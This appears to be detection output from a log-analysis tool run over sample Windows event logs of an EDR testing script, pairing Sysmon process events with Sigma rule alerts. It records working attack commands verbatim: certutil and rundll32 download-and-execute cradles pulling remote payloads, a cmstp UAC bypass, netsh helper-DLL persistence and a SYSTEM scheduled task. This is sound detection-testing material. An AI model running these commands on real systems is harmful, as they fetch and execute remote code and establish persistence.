+2019-07-30 06:33:58.286 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd  /c netsh trace show status      :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:58.485 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd  /c netsh.exe add helper AllTheThings.dll  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:58.543 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd  /c netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:58.598 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd  /c netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=0.0.0.0  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:58.683 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd  /c netsh trace stop  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:00.330 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: netsh  trace show status      :  Path: C:\Windows\System32\netsh.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: cmd  /c netsh trace show status    ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:00.420 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: netsh  trace start capture=yes filemode=append persistent=yes tracefile=trace.etl      :  Path: C:\Windows\System32\netsh.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: cmd  /c netsh trace start capture=yes filemode=append persistent=yes tracefile=trace.etl    ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:00.420 +09:00,MSEDGEWIN10,1,medium,Capture a Network Trace with netsh.exe,,rules/sigma/process_creation/win_netsh_packet_capture.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:00.434 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: netsh  trace stop  :  Path: C:\Windows\System32\netsh.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: cmd  /c netsh trace stop,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:00.442 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: netsh  interface portproxy delete v4tov4 listenport=8080 listenaddress=0.0.0.0  :  Path: C:\Windows\System32\netsh.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: cmd  /c netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=0.0.0.0,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:00.442 +09:00,MSEDGEWIN10,1,medium,Netsh Port Forwarding,,rules/sigma/process_creation/win_netsh_port_fwd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:00.460 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: netsh  interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1  :  Path: C:\Windows\System32\netsh.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: cmd  /c netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:00.460 +09:00,MSEDGEWIN10,1,medium,Netsh Port Forwarding,,rules/sigma/process_creation/win_netsh_port_fwd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:00.466 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: netsh.exe  add helper AllTheThings.dll  :  Path: C:\Windows\System32\netsh.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: cmd  /c netsh.exe add helper AllTheThings.dll,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:00.466 +09:00,MSEDGEWIN10,1,high,Suspicious Netsh DLL Persistence,,rules/sigma/process_creation/win_susp_netsh_dll_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:00.731 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:00.970 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout  5  :  Path: C:\Windows\System32\timeout.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:01.090 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\dispdiag.exe -out dispdiag_start.dat  :  Path: C:\Windows\System32\dispdiag.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: netsh  trace start capture=yes filemode=append persistent=yes tracefile=trace.etl    ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:05.237 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd  /c rundll32 AllTheThings.dll,EntryPoint  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:05.252 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout  5  :  Path: C:\Windows\System32\timeout.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:05.502 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32  AllTheThings.dll,EntryPoint  :  Path: C:\Windows\System32\rundll32.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: cmd  /c rundll32 AllTheThings.dll,EntryPoint",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:05.542 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32  AllTheThings.dll,EntryPoint  :  Path: C:\Windows\SysWOW64\rundll32.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: rundll32  AllTheThings.dll,EntryPoint",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:10.373 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd  /c rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test"")  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:10.373 +09:00,MSEDGEWIN10,1,medium,Suspicious Rundll32 Script in CommandLine,,rules/sigma/process_creation/win_pc_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:10.388 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout  5  :  Path: C:\Windows\System32\timeout.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:10.708 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32.exe  javascript:""\..\mshtml,RunHTMLApplication "";document.write();GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test"")  :  Path: C:\Windows\System32\rundll32.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: cmd  /c rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test"")",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:10.708 +09:00,MSEDGEWIN10,1,medium,Suspicious Rundll32 Script in CommandLine,,rules/sigma/process_creation/win_pc_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:11.501 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe""   :  Path: C:\Windows\System32\calc.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: rundll32.exe  javascript:""\..\mshtml,RunHTMLApplication "";document.write();GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test"")",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:12.352 +09:00,MSEDGEWIN10,3,medium,Rundll32 Internet Connection,,rules/sigma/network_connection/sysmon_rundll32_net_connections.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:15.226 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd  /c rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new0ActiveXObject(""WScript.Shell"").run(""calc.exe"",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject(""WScript.Shell"").Run(""cmd /c taskkill /f /im rundll32.exe && exit"",0,true);}  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:15.226 +09:00,MSEDGEWIN10,1,medium,Suspicious Rundll32 Script in CommandLine,,rules/sigma/process_creation/win_pc_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:15.252 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout  5  :  Path: C:\Windows\System32\timeout.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:15.658 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32.exe  javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new0ActiveXObject(""WScript.Shell"").run(""calc.exe"",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject(""WScript.Shell"").Run(""cmd /c taskkill /f /im rundll32.exe && exit"",0,true);}  :  Path: C:\Windows\System32\rundll32.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: cmd  /c rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new0ActiveXObject(""WScript.Shell"").run(""calc.exe"",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject(""WScript.Shell"").Run(""cmd /c taskkill /f /im rundll32.exe && exit"",0,true);}",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:15.658 +09:00,MSEDGEWIN10,1,medium,Suspicious Rundll32 Script in CommandLine,,rules/sigma/process_creation/win_pc_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:20.238 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd  /c certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1    :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:20.238 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:20.262 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout  5  :  Path: C:\Windows\System32\timeout.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:20.459 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: certutil.exe  -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1    :  Path: C:\Windows\System32\certutil.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: cmd  /c certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1  ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:20.459 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:25.202 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd  /c cmstp.exe /ni /s https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp.inf  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:25.269 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout  5  :  Path: C:\Windows\System32\timeout.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:25.659 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: cmstp.exe  /ni /s https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp.inf  :  Path: C:\Windows\System32\cmstp.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: cmd  /c cmstp.exe /ni /s https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp.inf,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:25.659 +09:00,MSEDGEWIN10,1,high,Bypass UAC via CMSTP,,rules/sigma/process_creation/win_uac_cmstp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:30.237 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd  /c forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:30.258 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout  5  :  Path: C:\Windows\System32\timeout.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:30.685 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: forfiles  /p c:\windows\system32 /m notepad.exe /c calc.exe  :  Path: C:\Windows\System32\forfiles.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: cmd  /c forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:30.807 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\calc.exe""  :  Path: C:\Windows\System32\calc.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: forfiles  /p c:\windows\system32 /m notepad.exe /c calc.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:30.807 +09:00,MSEDGEWIN10,1,low,Indirect Command Execution,,rules/sigma/process_creation/win_indirect_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:35.313 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd  /c winrm qc -q   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:35.337 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd  /c winrm i c wmicimv2/Win32_Process @{CommandLine=""calc""}  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:35.347 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout  5  :  Path: C:\Windows\System32\timeout.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:35.838 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cscript  //nologo ""C:\Windows\System32\winrm.vbs"" qc -q  :  Path: C:\Windows\System32\cscript.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: cmd  /c winrm qc -q ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:35.878 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cscript  //nologo ""C:\Windows\System32\winrm.vbs"" i c wmicimv2/Win32_Process @{CommandLine=""calc""}  :  Path: C:\Windows\System32\cscript.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: cmd  /c winrm i c wmicimv2/Win32_Process @{CommandLine=""calc""}",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:36.534 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: calc  :  Path: C:\Windows\System32\calc.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:36.534 +09:00,MSEDGEWIN10,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:40.261 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd  /c schtasks /create /tn ""mysc"" /tr C:\windows\system32\calc.exe /sc ONLOGON /ru ""System"" /f  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:40.261 +09:00,MSEDGEWIN10,1,high,Suspicious Calculator Usage,,rules/sigma/process_creation/win_susp_calc.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:40.385 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout  5  :  Path: C:\Windows\System32\timeout.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:40.889 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence - Scheduled Task Management  :  Command: schtasks  /create /tn ""mysc"" /tr C:\windows\system32\calc.exe /sc ONLOGON /ru ""System"" /f  :  Path: C:\Windows\System32\schtasks.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: cmd  /c schtasks /create /tn ""mysc"" /tr C:\windows\system32\calc.exe /sc ONLOGON /ru ""System"" /f",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:40.889 +09:00,MSEDGEWIN10,1,low,Scheduled Task Creation,,rules/sigma/process_creation/win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:40.889 +09:00,MSEDGEWIN10,1,high,Suspicious Calculator Usage,,rules/sigma/process_creation/win_susp_calc.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
